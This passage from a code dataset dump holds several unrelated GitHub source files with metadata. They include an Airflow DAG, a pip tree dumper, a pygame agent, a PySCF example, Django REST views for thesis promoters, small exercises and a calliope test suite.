This employee info will be stored in Data Rivers and extracted via PowerShell\n# to be merged into the Police Active Directory.\n\ndag = DAG(\n 'intime_employees',\n default_args=default_args,\n schedule_interval='@hourly',\n user_defined_filters={'get_ds_month': get_ds_month, 'get_ds_year': get_ds_year,\n 'get_ds_day': get_ds_day},\n max_active_runs=1\n)\n\n# initialize gcs locations\ndataset = \"intime\"\nbucket = f\"gs://{os.environ['GCS_PREFIX']}_{dataset}\"\npath = \"employees/{{ ds|get_ds_year }}/{{ ds|get_ds_month }}/{{ ds|get_ds_day }}/{{ run_id }}\"\njson_loc = f\"{path}_records.json\"\n\nintime_employees_gcs = BashOperator(\n task_id='intime_employees_gcs',\n bash_command=f\"python {os.environ['GCS_LOADER_PATH']}/intime_employees_gcs.py --output_arg {json_loc}\",\n execution_timeout=timedelta(hours=1),\n dag=dag\n)\n\nintime_employees_pandas = BashOperator(\n task_id='intime_employees_pandas',\n bash_command=f\"python {os.environ['PANDAS_ETL_PATH']}/intime_employees_pandas.py --input {json_loc}\",\n dag=dag\n)\n\n# Export table to IAPro bucket as readable CSV\nintime_iapro_export = BigQueryToCloudStorageOperator(\n task_id='intime_iapro_export',\n source_project_dataset_table=f\"{os.environ['GCLOUD_PROJECT']}.{dataset}.employee_data\",\n destination_cloud_storage_uris=[f\"gs://{os.environ['GCS_PREFIX']}_iapro/intime_report.csv\"],\n bigquery_conn_id='google_cloud_default',\n dag=dag\n)\n\nintime_employees_gcs >> intime_employees_pandas >> intime_iapro_export\n","repo_name":"CityofPittsburgh/data-rivers","sub_path":"af2_dags/intime_employees_airflow.py","file_name":"intime_employees_airflow.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"1106614651","text":"\nimport re \nimport os \nimport sys \nimport json \nimport subprocess \nfrom pathlib import Path \nfrom argparse import ArgumentParser\n\ndef open_output_file (path, *args, **kwargs):\n if path:\n return open(path, *args, **kwargs)\n else:\n fd = os.dup(sys.stdout.fileno())\n return os.fdopen(fd, *args, **kwargs)\n\ndef list_pip_installed ():\n packages = list()\n process = subprocess.run([\"pip\", \"freeze\"], shell=True, text=True, stdout=subprocess.PIPE, check=True)\n for line in process.stdout.strip().split(\"\\n\"):\n matchresult = re.match(r\"^(\\S+?)==\\S+$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n matchresult = re.match(r\"^(\\S+?) 
@ .*$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n matchresult = re.match(r\"^# Editable install with no version control \\((\\S+?)==.*$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n return packages\n\ndef get_pip_info (package):\n packageinfo = dict()\n process = subprocess.run([\"pip\", \"show\", package], shell=True, text=True, stdout=subprocess.PIPE, check=True)\n for line in process.stdout.strip().split(\"\\n\"):\n matchresult = re.match(r\"(.*?):(.*)\", line)\n if matchresult:\n key, value = matchresult.groups()\n if value.strip():\n if key.strip() == \"Requires\":\n packageinfo[key.strip()] = [val.strip() for val in value.split(\",\")]\n elif key.strip() == \"Required-by\":\n packageinfo[key.strip()] = [val.strip() for val in value.split(\",\")]\n else:\n packageinfo[key.strip()] = value.strip()\n return packageinfo\n\ndef get_pip_info_tree (packages):\n packageinfos = list()\n packageinfotable = dict()\n for package in packages:\n if package not in packageinfotable:\n packageinfotable[package] = get_pip_info(package)\n packageinfo = packageinfotable[package]\n packageinfos.append(packageinfo)\n packageinfostack = packageinfos.copy()\n while packageinfostack:\n packageinfo = packageinfostack.pop()\n if \"Dependencies\" not in packageinfo:\n for pkg in packageinfo.get(\"Requires\", []):\n if pkg not in packageinfotable:\n packageinfotable[pkg] = get_pip_info(pkg)\n pkginfo = packageinfotable[pkg]\n packageinfo.setdefault(\"Dependencies\", [])\n packageinfo[\"Dependencies\"].append(pkginfo)\n packageinfostack.append(pkginfo)\n return packageinfos\n\ndef dump_pip_info_tree (packageinfos, *, _depth=0, indent=2, file=sys.stdout):\n for packageinfo in packageinfos:\n if _depth:\n print(\"{:s}- {:s}=={:s}\".format(\" \" * _depth, packageinfo[\"Name\"], packageinfo[\"Version\"]), file=file)\n else:\n print(\"{:s}=={:s}\".format(packageinfo[\"Name\"], packageinfo[\"Version\"]), file=file)\n dump_pip_info_tree(packageinfo.get(\"Dependencies\", []), _depth=_depth + indent, indent=indent, file=file)\n\ndef main ():\n parser = ArgumentParser(description=\"Dump installed package info by pip.\")\n parser.add_argument(\"packages\", nargs=\"*\", help=\"Package names for dump.\")\n parser.add_argument(\"--json\", action=\"store_true\", help=\"Dump information as JSON format.\")\n parser.add_argument(\"--indent\", nargs=\"?\", default=2, help=\"Amount of indentation depth.\")\n parser.add_argument(\"--dump-root-only\", action=\"store_true\", help=\"If enabled, show root packages only.\")\n parser.add_argument(\"-o\", \"--output-file\", type=Path, help=\"Path of output file. 
(default is stdout).\")\n parser.add_argument(\"-v\", \"--version\", action=\"version\", version=\"%(prog)s 0.1.0\")\n args = parser.parse_args()\n if args.packages:\n packages = args.packages\n else:\n packages = list_pip_installed()\n packageinfos = get_pip_info_tree(packages)\n if args.dump_root_only: #--dump-root-onlyが真ならば親をもたないパッケージのみ抽出する。\n packageinfos = [packageinfo for packageinfo in packageinfos if not packageinfo.get(\"Required-by\", [])]\n with open_output_file(args.output_file, \"w\", encoding=\"utf-8\") as stream:\n if args.json:\n json.dump(packageinfos, stream, indent=args.indent)\n else:\n dump_pip_info_tree(packageinfos, file=stream, indent=args.indent)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tikubonn/pip-tree","sub_path":"pip_tree/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71052306228","text":"from dis import dis\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport random\r\nimport math\r\nimport Constants\r\nfrom Agent import Agent\r\n\r\nclass Sheep(Agent):\r\n\r\n\tdef __init__(self, image, pos, size, spd, color, turnSpd):\r\n\t\tsuper().__init__(image, pos, size, spd, color, turnSpd)\r\n\t\tself.isFleeing = False\r\n\t\tself.targetPos = None\r\n\t\tself.ticks = pygame.time.get_ticks()\r\n\t\r\n\tdef switchMode(self):\r\n\t\tif self.isFleeing:\r\n\t\t\tself.isFleeing = False\r\n\t\telse:\r\n\t\t\tself.isFleeing = True\r\n\r\n\tdef isPlayerClose(self, player):\r\n\t\tdistance = self.pos - player.pos\r\n\t\tif distance.length() < Constants.FLEE_RANGE:\r\n\t\t\tself.isFleeing = True\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tself.isFleeing = False\r\n\t\t\treturn False\r\n\r\n\tdef calcTrackingVelocity(self, player):\r\n\t\tself.targetPos = player.center\r\n\r\n\tdef updateDirectionTime(self):\r\n\t\tticks = pygame.time.get_ticks() - self.ticks\r\n\t\tif ticks > 1000:\r\n\t\t\tself.ticks = pygame.time.get_ticks()\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\tdef update(self, bounds, screen, player):\r\n\r\n\t\t# initialize velocity\r\n\t\tif pygame.Vector2.length(self.vel) == 0:\r\n\t\t\tangle = math.acos(random.randrange(-1, 1))\r\n\t\t\tself.vel = pygame.Vector2(math.cos(angle), math.sin(angle)) * self.spd\r\n\t\t\r\n\t\t#check if player is close\r\n\t\tself.isFleeing = self.isPlayerClose(player)\r\n\r\n\t\t# get boundary forces for sum\r\n\t\tboundsForce = self.computeBoundaryForces(bounds, screen)\r\n\r\n\t\t# wander if player isn't close\r\n\t\tif not self.isFleeing:\r\n\r\n\t\t\tif self.updateDirectionTime() == True:\r\n\t\t\t\ttheta = math.radians(random.randrange(-100, 100) / 100)\r\n\r\n\t\t\t\tpickTurn = random.randint(0, 100)\r\n\t\t\t\tif pickTurn < 50:\r\n\t\t\t\t\ttheta += 0\r\n\t\t\t\telse:\r\n\t\t\t\t\ttheta += 180\r\n\r\n\t\t\t\t#apply wander force\t\t\t\r\n\t\t\t\twanderDir = pygame.Vector2.normalize(self.vel) + pygame.Vector2(math.cos(theta), math.sin(theta))\r\n\t\t\t\twanderDirForce = wanderDir * Constants.ENEMY_WANDER_FORCE\r\n\t\t\t\twanderDirForceNorm = pygame.Vector2.normalize(wanderDirForce)\r\n\r\n\t\t\t\ttotalForce = wanderDirForceNorm + boundsForce\r\n\t\t\telse:\r\n\t\t\t\ttotalForce = boundsForce\r\n\r\n\t\t# otherwise, flee\r\n\t\telse:\r\n\t\t\t#apply flee force\r\n\t\t\t#store the calculated, normalized direction to the dog\r\n\t\t\tdirToDog = pygame.Vector2.normalize(player.pos - self.pos)\r\n\r\n\t\t\t#scale direction by the weight of this force to 
get applied force\r\n\t\t\tdirToDogForce = -dirToDog * Constants.ENEMY_FLEE_FORCE\r\n\t\t\t\t\t\t\r\n\t\t\ttotalForce = dirToDogForce + boundsForce\r\n\r\n\t\t\tself.calcTrackingVelocity(player)\r\n\t\t\t\t\t\r\n\t\t# prevent sheep from turning on a dime\r\n\t\tself.clampTurn(Constants.ENEMY_TURN_SPEED, totalForce)\r\n\r\n\t\t# update the agent\r\n\t\tsuper().update(bounds, screen)\r\n\r\n\tdef draw(self, screen):\r\n\t\tif self.isFleeing == True:\r\n\t\t\tpygame.draw.line(screen, (0, 0, 255), self.center, self.targetPos, 3)\r\n\r\n\t\tsuper().draw(screen)\r\n","repo_name":"cburel/DrivingSheep","sub_path":"DrivingSheep/MovingAgents/Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1217738630","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport tempfile\nimport numpy\nimport h5py\nfrom pyscf import gto, scf, ao2mo\n\n'''\nUHF-MP2\n'''\n\nmol = gto.M(\n verbose = 0,\n atom = 'O 0 0 0; O 0 0 1.2',\n basis = 'ccpvdz',\n spin = 2)\n\nm = scf.UHF(mol)\nprint(m.scf())\n\ndef myump2(mol, mo_energy, mo_coeff, mo_occ):\n o = numpy.hstack((mo_coeff[0][:,mo_occ[0]>0] ,mo_coeff[1][:,mo_occ[1]>0]))\n v = numpy.hstack((mo_coeff[0][:,mo_occ[0]==0],mo_coeff[1][:,mo_occ[1]==0]))\n eo = numpy.hstack((mo_energy[0][mo_occ[0]>0] ,mo_energy[1][mo_occ[1]>0]))\n ev = numpy.hstack((mo_energy[0][mo_occ[0]==0],mo_energy[1][mo_occ[1]==0]))\n no = o.shape[1]\n nv = v.shape[1]\n noa = sum(mo_occ[0]>0)\n nva = sum(mo_occ[0]==0)\n eri = ao2mo.general(mol, (o,v,o,v)).reshape(no,nv,no,nv)\n eri[:noa,nva:] = eri[noa:,:nva] = eri[:,:,:noa,nva:] = eri[:,:,noa:,:nva] = 0\n g = eri - eri.transpose(0,3,2,1)\n eov = eo.reshape(-1,1) - ev.reshape(-1)\n de = 1/(eov.reshape(-1,1) + eov.reshape(-1)).reshape(g.shape)\n emp2 = .25 * numpy.einsum('iajb,iajb,iajb->', g, g, de)\n return emp2\n\ne = myump2(mol, m.mo_energy, m.mo_coeff, m.mo_occ)\nprint('E(UMP2) = %.9g, ref = -0.346926068' % e)\n\n","repo_name":"pyscf/pyscf","sub_path":"examples/ao2mo/11-ump2.py","file_name":"11-ump2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"94"} +{"seq_id":"32034467319","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef chunkify(seq, size):\n \"\"\"\n Break up a given list in sub-lists of the given size.\n \"\"\"\n for i in range(0, len(seq), size):\n yield seq[i:i+size]\n","repo_name":"djangocon/2016.djangocon.eu","sub_path":"djangocon/tplutils/templatetags/chunkify.py","file_name":"chunkify.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"31377424187","text":"\"\"\"\n03/30/2020\n\nFor this program I reused the class PlayingCard from Assignment #9. This is an object oriented program, with instance\nvariables, class variables, and sorts a list the easy way. The program has a defined class where one object of the class\nrepresents one playing card. The program executes code and test a reusable class. This program calculates a comment for\nthe PlayingCard class and for every method in the class. This program has seven methods. This test program thoroughly\ntests all methods inside class PlayingCard. This program demonstrates additional practice with dictionaries. The class\nPlayingCard has a comment that states what one object of class PlayingCard represents. 
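For example, the suit precedence stored in the class-variable dictionary
get_rank (Clubs=4, Diamonds=3, Hearts=2, Spades=1) means __lt__() compares
suits before ranks, so sorted() lists every Spade ahead of every Heart,
Diamond, and Club, which is why "Ten of Spades" comes first and the Clubs
come last in the sample output below.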
Every method in class PlayingCard\nhas a comment that tells what the method does or returns. The dictionary translates from rank numbers and suit letters\nto words are class variables. Methods _eq__() and __lt__() return the correct value and contains a comment. The test\nprogram contains a list of PlayingCard objects, calls a built-in sort function to sort the list of PlayingCard objects,\nand test both _eq__() and __lt__() methods thoroughly before proceeding. Plus, a class decorator @total_ordering was added\nto class PlayingCard. The main program includes five PlayingCard objects, are placed into a Python list, and\nsorts the list using sorted() which are built into Python. The test code submitted includes at least one direct test\nof each of the new comparison methods, using the symbols \"==\" and \"<\".\n\"\"\"\n\n# My Program\nimport functools\n\nget_name = {}\nget_name[1] = 'Ace'\nget_name[2] = 'Two'\nget_name[3] = 'Three'\nget_name[4] = 'Four'\nget_name[5] = 'Five'\nget_name[6] = 'Six'\nget_name[7] = 'Seven'\nget_name[8] = 'Eight'\nget_name[9] = 'Nine'\nget_name[10] = 'Ten'\nget_name[11] = 'Jack'\nget_name[12] = 'Queen'\nget_name[13] = 'King'\n\nget_suit = {}\nget_suit['c'] = \"Clubs\"\nget_suit['d'] = \"Diamonds\"\nget_suit['h'] = \"Hearts\"\nget_suit['s'] = \"Spades\"\n\nget_rank = {}\nget_rank['Clubs'] = 4\nget_rank['Diamonds'] = 3\nget_rank['Hearts'] = 2\nget_rank['Spades'] = 1\n\n\n@functools.total_ordering\nclass PlayingCard:\n '''\n This class describes the rank and suit of the playing card. The rank is a number in the range 1-13 (indicating\n the ranks Ace through King, and suit is a single character \"d\" \"c\", \"h\", or \"s\" indicating the suit (diamonds,\n clubs, hearts, or spades).\n '''\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def getRank(self):\n '''\n This class returns the rank of the card as a number.\n '''\n return self.rank\n\n def getSuit(self):\n '''\n This class returns the suit of the card as a word.\n '''\n return get_suit[self.suit]\n\n def bjValue(self):\n '''\n This class returns the Blackjack value of a card. Ace has a blackjack value of 1, face cards all have blackjack\n value 10. The rest of the cards have blackjack values that are the same as their rank. 
The returned value from\n this method will always be a number.\n '''\n if self.rank < 10:\n return self.rank\n else:\n return 10\n\n def __str__(self):\n '''\n This class returns a string containing the full name of the card.\n '''\n return '{} of {}'.format(get_name[self.getRank()], self.getSuit())\n\n def __eq__(self, other):\n '''\n This class returns True if an existing playing card has the same rank and the same suit as the object \"other\"\n that is sent in as parameter.\n '''\n if self.getSuit() == other.getSuit() and self.getRank() == other.getRank():\n return True\n else:\n return False\n\n def __lt__(self, other):\n '''\n This class returns True if an existing object is less than the object \"other\" that is sent in as parameter,\n returns False otherwise.\n '''\n if get_rank[self.getSuit()] < get_rank[other.getSuit()]:\n return True\n elif get_rank[self.getSuit()] > get_rank[other.getSuit()]:\n return False\n else:\n if self.getRank() < other.getRank():\n return True\n else:\n return False\n\n\n# Below is the test program that creates and sorts five cards.\n\nc1 = PlayingCard(5, \"c\") # constructs the Card object\nc2 = PlayingCard(13, \"h\") # constructs the Card object\nc3 = PlayingCard(13, \"c\") # constructs the Card object\nc4 = PlayingCard(10, \"s\") # constructs the Card object\nc5 = PlayingCard(7, \"d\") # constructs the Card object\n\nlst = [c1, c2, c3, c4, c5]\nsorted_lst = sorted(lst)\nfor card in sorted_lst:\n print(card)\n\nprint(c2 == c3)\nprint(c1 < c3)\n\n# This is the actual output generated by the program above.\n\"\"\"\nTen of Spades\nKing of Hearts\nSeven of Diamonds\nFive of Clubs\nKing of Clubs\nFalse\nTrue\n\nProcess finished with exit code 0\n\"\"\"\n","repo_name":"acastillosanchez/Foothill-CS3A-Python","sub_path":"assignment10_GitHub.py","file_name":"assignment10_GitHub.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29242371054","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n \n def dfs(node, depth, res):\n if not node:\n return\n if depth >= len(res):\n res.append([])\n res[depth].append(node.val)\n dfs(node.left, depth + 1, res)\n dfs(node.right, depth + 1, res)\n \n res = []\n dfs(root, 0, res)\n return res\n","repo_name":"snowan/interviews","sub_path":"2021/python/102.binary-tree-level-order-traverse.py","file_name":"102.binary-tree-level-order-traverse.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"39659242806","text":"from rest_framework import generics, mixins, status\nfrom core.api.serializers import promoter as promoterSerializers\nfrom core.api.serializers import file as fileSerializers\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom core.permissions import IsAdministratorOrDeanWorker, IsStudent, IsStudentOfRecordFromUrl\nfrom rest_framework.response import Response\nfrom core.models import Promoter, Student, Record\nfrom django.db.models.query_utils import Q\nfrom core.my_functions import have_free_place, are_assigned_to_themselves, normalize_string\nfrom django.http import Http404\nimport io\nimport csv\n\n\n# Views associated with User model with promoter role\n\n\nclass 
PromoterBulkDelete(generics.CreateAPIView):\n serializer_class = promoterSerializers.PromoterBulkDeleteSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(\n data=request.data, many=True, context={'request': request})\n serializer.is_valid(raise_exception=True)\n list_of_ids = []\n for promoter_data in serializer.validated_data:\n list_of_ids.append(promoter_data[\"id\"])\n users_to_delete = Promoter.objects.filter(id__in=list_of_ids)\n if (len(users_to_delete) <= 0):\n return Response({'message': \"Couldn't find promoters to delete\", }, status=status.HTTP_400_BAD_REQUEST)\n else:\n users_to_delete.delete()\n return Response({\n 'message': \"Promoters successfully deleted\"\n })\n\n\nclass PromoterBulkRegister(generics.CreateAPIView):\n serializer_class = fileSerializers.FileAddSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(\n data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n file = serializer.validated_data['file']\n file_extension = str(file).split('.').pop()\n if (file_extension != 'csv'):\n return Response({'message': \"Wrong file extension\", }, status=status.HTTP_400_BAD_REQUEST)\n decoded_file = file.read().decode('utf-8-sig')\n io_string = io.StringIO(decoded_file)\n reader = csv.reader(io_string, delimiter=';')\n promoters = []\n for i, row in enumerate(reader):\n if i == 0:\n pass\n else:\n if len(row) != 9:\n return Response({'message': \"Wrong file structure\", }, status=status.HTTP_400_BAD_REQUEST)\n fn_wo_accents = normalize_string(row[1])\n ln_wo_accents = normalize_string(row[2])\n # Password (without accents) = last name + sign @ + additional chars from first column of file\n password = ln_wo_accents+'@'+row[0]\n try:\n max_students_number = int(row[4])\n except ValueError:\n return Response({'message': \"Błąd konwersji danych\", }, status=status.HTTP_400_BAD_REQUEST)\n else:\n obj = {\n 'user': {\n # Email (without accents) = first letter lowercased letter from name + lowercased last name + @uwm.pl\n 'email': fn_wo_accents[0].lower()+ln_wo_accents.lower()+'@uwm.pl',\n 'first_name': row[1],\n 'last_name': row[2],\n 'password': password,\n 'password2': password\n },\n 'title': row[3],\n 'max_students_number': int(row[4]),\n 'proposed_topics': row[5],\n 'unwanted_topics': row[6],\n 'interests': row[7],\n 'contact': row[8]\n }\n promoter = promoterSerializers.PromoterRegisterSerializer(\n data=obj)\n promoter.is_valid(raise_exception=True)\n promoters.append(obj)\n\n if (i == len(promoters)):\n for promoterData in promoters:\n promoter = promoterSerializers.PromoterRegisterSerializer(\n data=promoterData)\n promoter.is_valid(raise_exception=False)\n promoter.save()\n return Response({\n 'message': \"Promoters successfully registered\"\n })\n\n\nclass PromoterRegister(generics.CreateAPIView):\n serializer_class = promoterSerializers.PromoterRegisterSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response({\n 'message': \"Successfully registered a promoter\",\n 'user': {\n 'email': 
user.email,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'role': user.role,\n },\n })\n\n\nclass PromoterList(generics.ListAPIView):\n serializer_class = promoterSerializers.PromoterUserListSerializer\n permission_classes = (IsAuthenticated,)\n # permission_classes = [AllowAny]\n\n def get_queryset(self):\n user = self.request.user\n # If user is an administrator, he is able to see all promoters (even with User.active=False)\n if (user.role == 1):\n return Promoter.objects.all().order_by('-title', 'user__first_name', 'user__last_name')\n else:\n # If not - user see only promoters, who have active account\n return Promoter.objects.filter(Q(user__active=True)).order_by('-title', 'user__first_name', 'user__last_name')\n\n\nclass PromoterDetail(generics.RetrieveUpdateDestroyAPIView):\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return promoterSerializers.PromoterUserDetailWithFilesSerializer\n else:\n return promoterSerializers.PromoterUserDetailForAdminAndDeanWorkerSerializer\n\n def get_permissions(self):\n if self.request.method == 'GET':\n # Everyone who is logged are able to see promoter details\n return [IsAuthenticated(), ]\n else:\n # Only logged users with administrator, dean_worker role can change informations about specified promoter\n return [IsAuthenticated(), IsAdministratorOrDeanWorker(), ]\n\n def get_queryset(self):\n user = self.request.user\n # If user is an administrator, he is able to see all promoters (even with User.active=False)\n if (user.role == 1):\n return Promoter.objects.all()\n else:\n # If not - User see only promoters, who have active account\n return Promoter.objects.filter(Q(user__active=True))\n\n\nclass PromoterListForRecord(generics.ListAPIView):\n serializer_class = promoterSerializers.PromoterUserListSerializer\n permission_classes = (IsAuthenticated & IsStudent &\n IsStudentOfRecordFromUrl,)\n # permission_classes = [AllowAny]\n\n def get_queryset(self):\n record_id = self.kwargs.get('pk')\n if Record.objects.get(pk=record_id).was_revoked is True:\n raise Http404\n else:\n # Students are able to see only promoters, who have active account, have empty place for new student,\n # and actual student didn't choose them as preference in assigned records\n active_promoters = Promoter.objects.filter(Q(user__active=True))\n queryset = active_promoters\n user = self.request.user\n logged_student = Student.objects.get(user=user)\n for active_promoter in active_promoters:\n if ((have_free_place(promoter=active_promoter) == False) or (are_assigned_to_themselves(active_promoter, logged_student) == True)):\n queryset = queryset.exclude(id=active_promoter.id)\n return queryset.order_by('-title', 'user__first_name', 'user__last_name')\n\n\nclass PromoterDetailForRecord(mixins.RetrieveModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n serializer_class = promoterSerializers.PromoterUserDetailWithFilesSerializer\n permission_classes = (IsAuthenticated & IsStudent &\n IsStudentOfRecordFromUrl,)\n # permission_classes = [AllowAny];\n\n def get_object(self):\n record_id = self.kwargs.get('pk')\n if Record.objects.get(pk=record_id).was_revoked is True:\n raise Http404\n else:\n # Students are able to see only promoters, who have active account, have empty place for new student,\n # and actual student didn't choose them as preference in assigned records\n promoter_id = self.kwargs.get('pk_2')\n user = self.request.user\n student = Student.objects.get(user=user)\n try:\n promoter = Promoter.objects.get(\n 
id=promoter_id, user__active=True)\n except Promoter.DoesNotExist:\n raise Http404\n if ((have_free_place(promoter=promoter) == True) and (are_assigned_to_themselves(promoter=promoter, student=student) == False)):\n return promoter\n else:\n raise Http404\n\n lookup_url_kwarg = 'pk_2'\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n record_id = self.kwargs.get('pk')\n promoter_id = self.kwargs.get('pk_2')\n record = Record.objects.get(pk=record_id)\n promoter = Promoter.objects.get(pk=promoter_id)\n\n user = self.request.user\n student = Student.objects.get(user=user)\n\n if have_free_place(promoter=promoter) is False:\n return Response({\n 'message': \"This promoter hasn't got free place for new student\",\n }, status=status.HTTP_400_BAD_REQUEST)\n elif (are_assigned_to_themselves(promoter=promoter, student=student) == True):\n return Response({\n 'message': \"You already chose this promoter in one of your preferences\",\n }, status=status.HTTP_400_BAD_REQUEST)\n else:\n record.promoter = promoter\n record.save()\n return Response({\n 'message': \"Successfully added promoter on selected preference number\",\n })\n","repo_name":"tmatuszewski97/e-promotor-backend","sub_path":"ePromotor/core/api/views/promoter.py","file_name":"promoter.py","file_ext":"py","file_size_in_byte":10823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22530904578","text":"import importlib\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Optional\n\nimport numpy as np\nimport pytest\nfrom calliope import AttrDict\nfrom pyomo.repn.tests import lp_diff\n\nfrom .common.util import build_lp, build_test_model\n\nCALLIOPE_DIR: Path = importlib.resources.files(\"calliope\")\n\n\n@pytest.fixture(scope=\"class\")\ndef compare_lps(tmpdir_factory):\n def _compare_lps(model, custom_math, filename):\n lp_file = filename + \".lp\"\n generated_file = Path(tmpdir_factory.mktemp(\"lp_files\")) / lp_file\n backend = build_lp(model, generated_file, custom_math) # noqa: F841\n expected_file = Path(__file__).parent / \"common\" / \"lp_files\" / lp_file\n # Pyomo diff ignores trivial numeric differences (10 == 10.0)\n # But it does not ignore a re-ordering of components\n diff_ordered = lp_diff.load_and_compare_lp_baseline(\n generated_file.as_posix(), expected_file.as_posix()\n )\n # Our unordered comparison ignores component ordering but cannot handle\n # trivial differences in numerics (as everything is a string to it)\n diff_unordered = _diff_files(generated_file, expected_file)\n\n # If one of the above matches across the board, we're good to go.\n assert diff_ordered == ([], []) or not diff_unordered\n\n return _compare_lps\n\n\ndef _diff_files(file1, file2):\n file1_lines = file1.read_text().split(\"\\n\")\n file2_lines = file2.read_text().split(\"\\n\")\n return set(file1_lines).symmetric_difference(file2_lines)\n\n\nclass TestBaseMath:\n TEST_REGISTER: set = set()\n\n @pytest.fixture(scope=\"class\")\n def base_math(self):\n return AttrDict.from_yaml(CALLIOPE_DIR / \"math\" / \"base.yaml\")\n\n def test_flow_cap(self, compare_lps):\n self.TEST_REGISTER.add(\"variables.flow_cap\")\n model = build_test_model(\n {\n \"nodes.b.techs.test_supply_elec.constraints.flow_cap_max\": 100,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_min\": 1,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_max\": np.nan,\n },\n 
\"simple_supply,two_hours,investment_costs\",\n )\n custom_math = {\n # need the variable defined in a constraint/objective for it to appear in the LP file bounds\n \"objectives\": {\n \"foo\": {\n \"equations\": [\n {\n \"expression\": \"sum(flow_cap[techs=test_supply_elec], over=nodes)\"\n }\n ],\n \"sense\": \"minimise\",\n }\n }\n }\n compare_lps(model, custom_math, \"flow_cap\")\n\n # \"flow_cap\" is the name of the lp file\n\n def test_storage_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.storage_max\")\n model = build_test_model(\n scenario=\"simple_storage,two_hours,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\"storage_max\": model.math.constraints.storage_max}\n }\n compare_lps(model, custom_math, \"storage_max\")\n\n def test_flow_out_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.flow_out_max\")\n model = build_test_model(\n {\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_min\": 100,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_max\": 100,\n },\n \"simple_supply,two_hours,investment_costs\",\n )\n\n custom_math = {\n \"constraints\": {\"flow_out_max\": model.math.constraints.flow_out_max}\n }\n compare_lps(model, custom_math, \"flow_out_max\")\n\n def test_balance_conversion(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.balance_conversion\")\n\n model = build_test_model(\n scenario=\"simple_conversion,two_hours,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\n \"balance_conversion\": model.math.constraints.balance_conversion\n }\n }\n\n compare_lps(model, custom_math, \"balance_conversion\")\n\n def test_source_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.source_max\")\n model = build_test_model(\n {},\n \"simple_supply_plus,resample_two_days,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\"my_constraint\": model.math.constraints.source_use_max}\n }\n compare_lps(model, custom_math, \"source_max\")\n\n @pytest.mark.xfail(reason=\"not all base math is in the test config dict yet\")\n def test_all_math_registered(self, base_math):\n \"After running all the previous tests in the class, the base_math dict should be empty, i.e. 
